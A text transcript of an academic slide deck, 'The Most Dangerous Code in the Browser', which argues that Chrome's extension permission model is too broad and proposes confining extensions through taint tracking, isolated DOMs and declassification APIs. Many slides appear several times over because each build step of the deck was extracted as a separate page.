The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions...
Transcript of The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions...
![Page 1: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/1.jpg)
The Most Dangerous Code in the Browser
Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan
![Page 2: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/2.jpg)
Modern web experience
![Page 3: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/3.jpg)
Modern web experience
![Page 4: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/4.jpg)
Modern web experience
…
Core browser
Evernote
AdBlockNYTimes Chase
Web apps Extensions
![Page 5: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/5.jpg)
Web app security
• Trust model: malicious code
• Apps are isolated according to same-origin policy
• Apps are constrained to Web APIs (e.g., DOM)
➤ They cannot access arbitrary files, devices, etc.
Core browser
NYTimes Chase
Web APIs
❌
![Page 6: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/6.jpg)
Extension security?
• Extensions need direct access to app DOMs
➤ They modify app style, content, behavior, …
• Extensions need privileged APIs
➤ To fetch/store cross-origin content, to read/modify history and bookmarks, to create new tabs, etc.
NYTimes AdBlock
Core browserPrivileged APIs
![Page 7: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/7.jpg)
• Trust model: extensions are benign-but-buggy
• Privilege separate extension: core and content
➤ Protects vulnerable extension from malicious apps
• Run extensions with least privilege
➤ Limits damage due to exploits
Chrome extension security model
NYTimes AdBlock
![Page 8: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/8.jpg)
Least privilege via permission system
• Extensions declare necessary permissions
• Users must grant permissions at install time
{ "name": “AdBlock Plus", "version": "2.1.10", ... "permissions": [ "http://*/*", "https://*/*", "contextMenus" ], ...
![Page 9: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/9.jpg)
What does mean?
• Can read and modify data on any site, regardless of what site you are visiting
• AdBlock must be a special case, right?
➤ 71.6% of top 500 extensions need this privilege!
NYTimes AdBlock
chase.com
![Page 10: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/10.jpg)
What does mean?
• Can read and modify data on any site, regardless of what site you are visiting
• AdBlock must be a special case, right?
➤ 71.6% of top 500 extensions need this privilege!
NYTimes AdBlock
chase.com
![Page 11: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/11.jpg)
It gets worse with popularity
10
100
1000
10000
100000
1000000
10000000
0
0.2
0.4
0.6
0.8
1
1.2
1 51 101 151 201 251 301 351 401 451
Top n extensions
Num
ber
of u
sers
(few
day
s la
ter)
Frac
tion
that
can
rea
d an
d ch
ange
…
![Page 12: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/12.jpg)
It gets worse with popularity
10
100
1000
10000
100000
1000000
10000000
0
0.2
0.4
0.6
0.8
1
1.2
1 51 101 151 201 251 301 351 401 451
% of n that can read and change all your data…
Top n extensions
Num
ber
of u
sers
(few
day
s la
ter)
Frac
tion
that
can
rea
d an
d ch
ange
…
![Page 13: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/13.jpg)
It gets worse with popularity
10
100
1000
10000
100000
1000000
10000000
0
0.2
0.4
0.6
0.8
1
1.2
1 51 101 151 201 251 301 351 401 451
# of users
% of n that can read and change all your data…
Top n extensions
Num
ber
of u
sers
(few
day
s la
ter)
Frac
tion
that
can
rea
d an
d ch
ange
…
![Page 14: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/14.jpg)
It gets worse with popularity
10
100
1000
10000
100000
1000000
10000000
0
0.2
0.4
0.6
0.8
1
1.2
1 51 101 151 201 251 301 351 401 451
# of users
% of n that can read and change all your data…
Top n extensions
Num
ber
of u
sers
(few
day
s la
ter)
Frac
tion
that
can
rea
d an
d ch
ange
…Removed from Chrome Web Store
![Page 15: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/15.jpg)
Problem with Chrome’s model
• Permission requests are meaningless
➤ Descriptions are broad and context-independent
• Model encourages principle of most privilege
➤ Extensions don’t auto-update if they need more privs
• Threat model is not realistic
➤ Chrome Web Store listed many malicious extensions
➤ Roughly 5% of Google users run malicious extensions
![Page 16: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/16.jpg)
Problem with Chrome’s model
• Permission requests are meaningless
➤ Descriptions are broad and context-independent
• Model encourages principle of most privilege
➤ Extensions don’t auto-update if they need more privs
• Threat model is not realistic
➤ Chrome Web Store listed many malicious extensions
➤ Roughly 5% of Google users run malicious extensions
![Page 17: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/17.jpg)
Problem with Chrome’s model
• Permission requests are meaningless
➤ Descriptions are broad and context-independent
• Model encourages principle of most privilege
➤ Extensions don’t auto-update if they need more privs
• Threat model is not realistic
➤ Chrome Web Store listed many malicious extensions
➤ Roughly 5% of Google users run malicious extensions
![Page 18: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/18.jpg)
New extension-system goals• Meaningful permission system
➤ Safe behavior should not require permission
➤ Permissions requests should be content-specific
• Model should encourage least privilege
➤ Permissions should be fine-grained
➤ Incentivize safe extensions
• Threat model: extensions may be malicious
➤ Need to also protect user app data from extensions
![Page 19: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/19.jpg)
New extension-system goals• Meaningful permission system
➤ Safe behavior should not require permission
➤ Permissions requests should be content-specific
• Model should encourage least privilege
➤ Permissions should be fine-grained
➤ Incentivize safe extensions
• Threat model: extensions may be malicious
➤ Need to also protect user app data from extensions
![Page 20: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/20.jpg)
New extension-system goals• Meaningful permission system
➤ Safe behavior should not require permission
➤ Permissions requests should be content-specific
• Model should encourage least privilege
➤ Permissions should be fine-grained
➤ Incentivize safe extensions
• Threat model: extensions may be malicious
➤ Need to also protect user app data from extensions
![Page 21: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/21.jpg)
How can we do this?
Insight: it is safe for extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint extensions according to what it reads
➤ Confine code to protect user’s privacy
Checker
gmail.com
![Page 22: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/22.jpg)
How can we do this?
Insight: it is safe for extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint extensions according to what it reads
➤ Confine code to protect user’s privacy
✗Checker
gmail.com
![Page 23: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/23.jpg)
How can we do this?
Insight: it is safe for extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint extensions according to what it reads
➤ Confine code to protect user’s privacy
✗Checker
gmail.com
![Page 24: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/24.jpg)
How can we do this?
Insight: it is safe for extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint extensions according to what it reads
➤ Confine code to protect user’s privacy
✗Checker
gmail.com
![Page 25: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/25.jpg)
How can we do this?
Insight: it is safe for extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint extensions according to what it reads
➤ Confine code to protect user’s privacy
✗Checker
gmail.com
![Page 26: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/26.jpg)
How can we do this?
Insight: it is safe for extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint extensions according to what it reads
➤ Confine code to protect user’s privacy
✗Checker
evil.gov❌
gmail.com
![Page 27: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/27.jpg)
Safely read and modify pages?
![Page 28: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/28.jpg)
Safely read and modify pages?
✗
![Page 29: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/29.jpg)
Safely read and modify pages?
• Idea: tie extension script with app page
➤ Impose at least same-origin policy on extension
• Challenge: read data from page and leak it by injecting content into page’s DOM
• Solution: taint extension, write to isolated DOM
➤ Loads due to extension restricted: confined!
NYTimes AdBlock
chase.com❌
![Page 30: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/30.jpg)
Safely read and modify pages?
• Idea: tie extension script with app page
➤ Impose at least same-origin policy on extension
• Challenge: read data from page and leak it by injecting content into page’s DOM
• Solution: taint extension, write to isolated DOM
➤ Loads due to extension restricted: confined!
NYTimes AdBlock
chase.com❌
![Page 31: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/31.jpg)
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
NYTimes Evernote
evernote.com❌
NYTimes
![Page 32: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/32.jpg)
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
NYTimes Evernote
evernote.com❌
NYTimes
![Page 33: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/33.jpg)
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
NYTimes Evernote
evernote.com❌
NYTimes
![Page 34: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/34.jpg)
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
NYTimes Evernote
evernote.com❌
NYTimes
![Page 35: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/35.jpg)
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
NYTimes Evernote
evernote.com❌
NYTimes Evernote
![Page 36: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/36.jpg)
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
NYTimes Evernote
evernote.com❌
NYTimes Evernote
evernote.com
![Page 37: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/37.jpg)
Usable confinement via APIs
• Crypto API
➤ Convert tainted values to encrypted blobs (LastPass)
• Declarative CSS API
➤ Taint-oblivious styling changes
• Network filtering API
➤ Allow/deny network requests given regex (AdBlock)
• …
![Page 38: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/38.jpg)
How can permissions be more meaningful?
• Many extensions can be safe by default
➤ Confinement protects user privacy
➤ Incentivize developers by making warnings rare
• To capture remaining models: need permissions
➤ Use declassification as guide for informing messages: what data is being “leaked”?
- E.g., URLS, page location, whole page, etc.
![Page 39: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/39.jpg)
How can permissions be more meaningful?
• Many extensions can be safe by default
➤ Confinement protects user privacy
➤ Incentivize developers by making warnings rare
• To capture remaining models: need permissions
➤ Use declassification as guide for informing messages: what data is being “leaked”?
- E.g., URLS, page location, whole page, etc.
![Page 40: The Most Dangerous Code in the Browserdstefan/pubs/heule:2015:... · 71.6% of top 500 extensions need this privilege! NYTimes AdBlock chase.com. ... Top n extensions … ) Removed](https://reader034.fdocuments.us/reader034/viewer/2022050107/5f452eb080ef1e11c37ca146/html5/thumbnails/40.jpg)
Summary
• Extensions: most dangerous code in the browser
➤ Third-party, unaudited, highly-privileged JavaScript
• Rethink extension security systems
➤ Need to protect user privacy from extensions
➤ Make user permissions requests rare and clear
• One direction: confinement + new APIs
➤ Captures many extensions as “safe”, makes permission requests rare